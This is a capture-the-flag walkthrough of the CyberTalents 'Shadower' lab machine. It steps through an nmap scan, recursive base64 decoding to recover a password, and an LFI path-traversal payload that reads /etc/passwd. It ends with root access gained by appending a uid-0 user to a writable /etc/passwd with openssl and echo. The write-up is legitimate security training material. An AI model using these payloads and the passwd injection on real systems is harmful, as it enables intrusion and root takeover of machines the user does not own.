CyberTalents Shadower Machine Walkthrough

CyberTalents Shadower Machine Walkthrough

CyberTalents Shadower Machine Walkthrough, we will do
Scanning, enumeration, get a user shell, privilege escalation and Capture the Flag!!

Challenge Link:

https://cybertalents.com/challenges/machines/shadower

Scanning:

identify open ports and services, we used nmap Aggressive scan (-A) on all ports (-p-) and speed up with (T4)

nmap -A -p- -T4 172.24.209.176 -oA shadower

shadower nmap

Found Open ports: HTTP service on port 80 and SSH on port 22

Enumeration:

Using dirb tool, We found index.php

Cybertalents shadower dirb

browser it, and clicking available links and view pages source (CTRL+U)

view-source:http://172.24.209.176/index.php?view=contact-us.html

Cybertalents shadower page source

Found interesting text: my0wns3cr3t.sec

It maybe a password or directory or a file!!

Try it as a path :

view-source:http://172.24.209.176/index.php?view=my0wns3cr3t.sec

It is a long base64 encoded string:

Cybertalents shadower base64

Base64 Decode

Trying to decode it, it produces another base64 string, tried to decode the result multiple times but still produce another base64 string.
It is multi cyclic encoding, I tried to automate the process using python script:

#!/usr/bin/python3

import base64

encoded_text = “….ENCODED_STRING_HERE….”
temp = []

while True:
    try:
        decoded = base64.b64decode(encoded_text)
       encoded_text = decoded
    except:
       break
    temp.append(decoded)
print(temp[-2])

Got a string: B100dyPa$$w0rd

Notice: remove the binary indicator character and the single quotes (b”)

Keep browsing other links, found LFI vulnerability and We can read passwd file!

http://172.24.209.176/index.php?view=../../../../../../etc/passwd

Cybertalents shadower passwd file

Get a shell

we can see usernames for that box, user john seems to be the actual user.

let’s try to ssh for user john with the encoded result as password

ssh [email protected]

Password: B100dyPa$$w0rd

Cybertalents shadower user shell

We Got a user shell

Privilege Escalation:

upload linpease.sh script to enumerate for higher privileges paths.

just copy its content to a file, or you could get it from your local machine using scp, http server, ftp, .. or as you like.

vim linpeas.sh
chmod +x linpeas.sh
bash linpeas.sh

Cybertalents shadower start linpeas

After reviewing the result, seems we can write to /etc/passwd !!

Cybertalents shadower writable passwd file

let’s inject our root user.

Root the machine

Create encrypted password using openssl

openssl passwd hackme
1BQF1p1LiZUVQ

Create a user named hackme with the encrypted password we just created with id of (0) like the root id

 echo hackme:1BQF1p1LiZUVQ:0:0:hackme:/root:/bin/bash >> /etc/passwd

Switch to the new user

su hackme
Password:

We are root

root@ip-172-31-43-49:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@ip-172-31-43-49:/home/john#

Cybertalents shadower root

Capture The Flag:

It’s time to win the prize, read the content of the flag file named root.txt in /root directory

cat /root/root.txt

Congratulations, you rooted the box and captured the flag.

Comments are closed.